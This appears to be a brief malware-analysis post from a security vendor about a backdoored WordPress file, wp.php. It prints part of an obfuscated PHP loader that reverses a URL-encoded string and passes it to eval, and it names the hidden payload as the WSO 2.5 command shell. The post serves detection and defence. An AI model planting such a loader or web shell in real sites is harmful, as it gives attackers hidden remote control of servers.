If we look inside this PHP script (only a small part of the code):
@error_reporting(0);@set_time_limit(0); $code="%3Btixe%0D%0A%3B%29%5D%27a%27%5BTSOP_%24+.+%27noitca%27%28cnuf_resu_llac%09%0D%0A%29+$ $code=@urldecode($code);$code=@strrev($code);@eval($code);
Execute wp.php
If we run this, we found PHP Command shell WSO 2.5 (backdoor) this file:
wp.php
Detect this malware
Malware Expert – Signatures found this malware from php code, if you want use our signatures for free.